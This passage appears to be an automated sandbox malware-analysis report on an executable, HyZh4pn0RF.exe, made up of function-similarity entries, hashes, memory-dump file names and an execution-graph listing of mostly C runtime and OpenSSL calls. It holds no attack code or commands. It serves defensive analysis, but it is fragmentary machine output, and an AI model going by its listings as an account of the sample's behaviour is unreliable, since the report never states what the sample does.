                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 37f11bff6435397977a72d10ea920e23e99348e21692b2c86dd33bc4ced2177b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68D1D172B18A8289E710DF65D4406ECB7B1FB44798BA44236DF5D97BE9EE38D406C310
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                                                                                                  • Instruction ID: fcacf94c22708ca62206b79f60b6ecf0a9374f0b58d89f051879ea38de02c425
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4411A931E285C282F654A77AF5542F99291FF85B81FE48032EA4D07B9DCE7CD6C5C620
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                                  • Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8174b47a5d51ec8d9f0fd78c45a99338307426805615aa363cfe97fe20b73ee2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B341F632B196C246FB20AB26E4457B99660FF907A4FB44236EF5D07AD9EE3CD442C710
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4995D6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF22
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F49AF0C: GetLastError.KERNEL32(?,?,?,00007FF78F4A3392,?,?,?,00007FF78F4A33CF,?,?,00000000,00007FF78F4A3895,?,?,00000000,00007FF78F4A37C7), ref: 00007FF78F49AF2C
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF78F48BFE5), ref: 00007FF78F4995F4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 3580290477-891532016
                                                                                                                                                                                                                                                                                                  • Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 95cfef40d6c0f7798d9e92d9db5130c43ce1d404f151c24588b498a93feefa6d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18416E32B0979286EB54FF2594408F9A794FB847D4BA44037EA4E47BA5DF3DE881C320
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                                                                  • Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                                                                                                                                                                                                                                                                  • Instruction ID: 429de10f4068c4e8a0f8bad83eac5b0146fdf536650867590c9ca0745da381b3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6941D232B19A8185EB20AF65E4447E9E7A0FB88790FE04036EE8D87799DF3DD445C720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                                                                  • Opcode ID: 37476e9fe501e7f44791a553affc3ffa80e4bc938821bb0c9fc6a7376d994417
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a2e2682559d4e9ccd5d347fa16834cd518ef4a9c8f383193f4636803c6da4b9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37476e9fe501e7f44791a553affc3ffa80e4bc938821bb0c9fc6a7376d994417
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3621F372B186C181EB20AB15D0496BEB3B1FB84B48FE18037DA9D43298DF7CE945C761
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: Error detected
                                                                                                                                                                                                                                                                                                  • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                                                                                                  • Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                                                                                                                                                                                                                                                                  • Instruction ID: 598cfd93b13dd052d77aeb280c79e2add988f72d11923f3de8499e236d7878c1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1215672638AC591E720EB11F4916EAA364FF84784FE05137E64D47A65DF3CD215C720
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                                                                  • String ID: Fatal error detected
                                                                                                                                                                                                                                                                                                  • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                                                                                                  • Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                                                                                                                                                                                                                                                                  • Instruction ID: 140f4f445ee296a450d3f88c176e32a817e4ec169da7cf4e47d3afe5395afbe0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46214472638AC591E720AB11E4516EAA364FF84784FE05136E64D47A69DF3CD319CB20
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                                                                  • Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                                                                                                                                                                                                                                                                  • Instruction ID: d2de07ed9c72f60b733f8bc60a293e7a8901bc47a87646868300cee661097eb7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E116D32A28B8182EB609F15F4402A9B7E0FB88B94FA84236DECC47759DF3CC551CB00
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                                                                  • Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                                                                                                                                                                                                                                                                  • Instruction ID: d132aecf7ec6a0c049a8db696612c92101502acbc41b79e065371d2a90daa673
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB014471A1D28686FB60BF6594612FEA3A0FF88705FE40037D54D47696DF3CE584CA24

                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:1.1%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                  Signature Coverage:6%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:744
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:66
                                                                                                                                                                                                                                                                                                  execution_graph 90935 7ffbab76e240 90939 7ffbab76e25a 90935->90939 90936 7ffbab76e500 ERR_new 90937 7ffbab76e50a ERR_set_debug 90936->90937 90944 7ffbab76e557 90937->90944 90938 7ffbab76e591 ERR_new 90938->90937 90939->90936 90939->90938 90940 7ffbab76e576 90939->90940 90943 7ffbab76e5a0 ERR_new ERR_set_debug 90939->90943 90939->90944 90945 7ffbab76e3be BUF_MEM_grow_clean 90939->90945 90946 7ffbab76e52d ERR_new ERR_set_debug 90939->90946 90941 7ffbab76e582 ERR_new 90940->90941 90940->90944 90942 7ffbab76e4cd ERR_set_debug 90941->90942 90942->90944 90943->90944 90945->90939 90945->90946 90946->90944 90947 7ffbaa5bd329 90948 7ffbaa5bd338 90947->90948 90950 7ffbaa5c0d4e 90948->90950 90951 7ffbaa5bd411 90948->90951 90971 7ffbaa5a2f20 90948->90971 90952 7ffbaa5c0e6a 90950->90952 90955 7ffbaa5c0dda 90950->90955 90981 7ffbaa5894b0 14 API calls 90950->90981 90951->90950 90956 7ffbaa5bad10 90951->90956 90957 7ffbaa5c0f17 90951->90957 90953 7ffbaa5c1376 90983 7ffbaa5894b0 14 API calls 90953->90983 90955->90953 90982 7ffbaa5b0f90 14 API calls 90955->90982 90979 7ffbaa586c20 15 API calls new[] 90957->90979 90961 7ffbaa5c13c8 90962 7ffbaa5c13da 90961->90962 90984 7ffbaa5b45a0 67 API calls 90961->90984 90967 7ffbaa5c13eb 90962->90967 90985 7ffbaa586db0 14 API calls 90962->90985 90963 7ffbaa5bd374 90963->90950 90963->90951 90978 7ffbaa5a4230 16 API calls 90963->90978 90964 7ffbaa5c0f3a 90964->90952 90980 7ffbaa5dfb70 16 API calls 90964->90980 90967->90952 90986 7ffbaa5dfb70 16 API calls 90967->90986 90972 7ffbaa59b080 90971->90972 90973 7ffbaa59b0c7 memset 90972->90973 90974 7ffbaa59b19c 90972->90974 90973->90974 90975 7ffbaa59b0f2 90973->90975 90974->90963 90975->90974 90977 7ffbaa59b13f memset 90975->90977 90987 7ffbaa5862e0 90975->90987 90977->90975 90978->90951 90979->90964 90980->90952 90981->90955 90982->90953 90983->90961 90984->90962 90985->90967 90986->90952 90988 7ffbaa5862f9 90987->90988 90989 7ffbaa5863a0 90987->90989 90988->90989 90991 7ffbaa585ca5 malloc 90988->90991 90989->90975 90992 7ffbaa585cbe 90991->90992 90993 7ffbaa585cd0 90991->90993 90995 7ffbaa5894b0 14 API calls 90992->90995 90993->90989 90995->90993 90996 7ffbab738b00 90997 7ffbab738b1a 90996->90997 90998 7ffbab738b30 ERR_new ERR_set_debug ERR_set_error 90997->90998 90999 7ffbab738b68 90997->90999 91005 7ffbab738c17 90998->91005 91000 7ffbab738b6e ERR_new ERR_set_debug ERR_set_error 90999->91000 91001 7ffbab738bad 90999->91001 91000->91005 91002 7ffbab738bc2 ERR_new ERR_set_debug ERR_set_error 91001->91002 91003 7ffbab738bf4 91001->91003 91002->91005 91004 7ffbab738c0d ASYNC_get_current_job 91003->91004 91003->91005 91004->91005 91006 7ffbab72cb40 91007 7ffbab72cec0 91006->91007 91008 7ffbab72cb49 91006->91008 91008->91007 91009 7ffbab72cb90 CRYPTO_free CRYPTO_free 91008->91009 91010 7ffbab72cbdf 91009->91010 91011 7ffbab72cbe9 7 API calls 91009->91011 91010->91011 91012 7ffbab7111db 91011->91012 91013 7ffbab72cc42 OPENSSL_sk_pop_free OPENSSL_sk_pop_free OPENSSL_sk_pop_free OPENSSL_sk_free 91012->91013 91031 7ffbab711811 91013->91031 91015 7ffbab72cc96 91016 7ffbab72cca2 CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_secure_free 91015->91016 91017 7ffbab72cd2b EVP_MD_get0_provider 91016->91017 91018 7ffbab72cd40 91016->91018 91017->91018 91019 7ffbab72cd38 EVP_MD_free 91017->91019 91020 7ffbab72cd4c EVP_MD_get0_provider 91018->91020 91021 7ffbab72cd61 91018->91021 91019->91018 91020->91021 91022 7ffbab72cd59 EVP_MD_free 91020->91022 91023 7ffbab72cd78 EVP_CIPHER_get0_provider 91021->91023 91025 7ffbab72cd97 91021->91025 91022->91021 91023->91021 91024 7ffbab72cd85 EVP_CIPHER_free 91023->91024 91024->91021 91026 7ffbab72cdac EVP_MD_get0_provider 91025->91026 91028 7ffbab72cdcb 91025->91028 91026->91025 91027 7ffbab72cdb9 EVP_MD_free 91026->91027 91027->91025 91029 7ffbab72ce4a CRYPTO_free CRYPTO_free CRYPTO_THREAD_lock_free CRYPTO_free CRYPTO_free 91028->91029 91030 7ffbab72cde1 CRYPTO_free CRYPTO_free CRYPTO_free 91028->91030 91029->91007 91030->91029 91030->91030 91031->91015 91032 7ffbab752960 91031->91032 91033 7ffbab75297f 10 API calls 91032->91033 91034 7ffbab752977 91032->91034 91033->91015 91034->91015 91035 7ffbaa5be9e7 91036 7ffbaa5bea0c 91035->91036 91037 7ffbaa5bea21 91035->91037 91075 7ffbaa5c5690 29 API calls 91036->91075 91056 7ffbaa5a5070 91037->91056 91042 7ffbaa5c0437 91043 7ffbaa5bea18 91043->91042 91046 7ffbaa5c0dda 91043->91046 91076 7ffbaa5894b0 14 API calls 91043->91076 91044 7ffbaa5c1376 91078 7ffbaa5894b0 14 API calls 91044->91078 91046->91044 91077 7ffbaa5b0f90 14 API calls 91046->91077 91049 7ffbaa5c13c8 91050 7ffbaa5c13da 91049->91050 91079 7ffbaa5b45a0 67 API calls 91049->91079 91051 7ffbaa5c13eb 91050->91051 91080 7ffbaa586db0 14 API calls 91050->91080 91055 7ffbaa5c0e70 91051->91055 91081 7ffbaa5dfb70 16 API calls 91051->91081 91058 7ffbaa5a5145 91056->91058 91061 7ffbaa5a5097 91056->91061 91057 7ffbaa5a521c 91093 7ffbaa5894b0 14 API calls 91057->91093 91067 7ffbaa5a514a 91058->91067 91082 7ffbaa5a12f0 91058->91082 91060 7ffbaa5a509d 91063 7ffbaa5a51f3 91060->91063 91064 7ffbaa5a51e7 91060->91064 91060->91067 91061->91057 91061->91060 91061->91067 91092 7ffbaa5a4e60 40 API calls 91063->91092 91091 7ffbaa642590 14 API calls 91064->91091 91067->91043 91068 7ffbaa5a5260 91067->91068 91069 7ffbaa5a5283 91068->91069 91070 7ffbaa5a53d0 91069->91070 91071 7ffbaa5a53e8 91069->91071 91072 7ffbaa5a12f0 40 API calls 91069->91072 91162 7ffbaa5894b0 14 API calls 91069->91162 91070->91043 91163 7ffbaa5894b0 14 API calls 91071->91163 91072->91069 91075->91043 91076->91046 91077->91044 91078->91049 91079->91050 91080->91051 91081->91055 91083 7ffbaa5a1354 91082->91083 91084 7ffbaa5a130d 91082->91084 91094 7ffbaa599e80 91083->91094 91115 7ffbaa5894b0 14 API calls 91084->91115 91086 7ffbaa5a133e 91086->91061 91089 7ffbaa5a1369 91089->91061 91091->91067 91092->91067 91093->91067 91095 7ffbaa599ed5 91094->91095 91096 7ffbaa599ea2 91094->91096 91117 7ffbaa594ec0 91095->91117 91129 7ffbaa5894b0 14 API calls 91096->91129 91098 7ffbaa599ece 91098->91089 91116 7ffbaa5a0fc0 14 API calls 91098->91116 91099 7ffbaa599ff8 91130 7ffbaa5894b0 14 API calls 91099->91130 91100 7ffbaa59a050 91102 7ffbaa59a07e 91100->91102 91105 7ffbaa59a068 91100->91105 91109 7ffbaa59a09a 91102->91109 91110 7ffbaa599f0d 91102->91110 91104 7ffbaa599ef4 91104->91098 91104->91099 91104->91100 91104->91110 91123 7ffbaa597c40 91105->91123 91106 7ffbaa59a0d5 memset 91106->91098 91108 7ffbaa59a0bd 91133 7ffbaa5966f0 18 API calls new[] 91108->91133 91109->91106 91109->91108 91132 7ffbaa5931c0 16 API calls new[] 91109->91132 91110->91098 91131 7ffbaa596ff0 36 API calls 91110->91131 91113 7ffbaa59a0c7 91113->91106 91115->91086 91116->91089 91118 7ffbaa594f17 91117->91118 91119 7ffbaa594f3e 91118->91119 91122 7ffbaa594f53 91118->91122 91143 7ffbaa594810 15 API calls new[] 91118->91143 91119->91104 91122->91119 91122->91122 91134 7ffbaa594640 91122->91134 91124 7ffbaa597c7c 91123->91124 91125 7ffbaa597c6f 91123->91125 91127 7ffbaa597c8c 91124->91127 91146 7ffbaa58dc50 91124->91146 91159 7ffbaa59e520 16 API calls 91125->91159 91127->91110 91129->91098 91130->91110 91132->91108 91133->91113 91138 7ffbaa594759 91134->91138 91139 7ffbaa594668 91134->91139 91135 7ffbaa59475e 91145 7ffbaa5943d0 14 API calls new[] 91135->91145 91137 7ffbaa59474f 91144 7ffbaa5943d0 14 API calls new[] 91137->91144 91138->91119 91141 7ffbaa5862e0 new[] 14 API calls 91139->91141 91142 7ffbaa5946d6 91139->91142 91141->91142 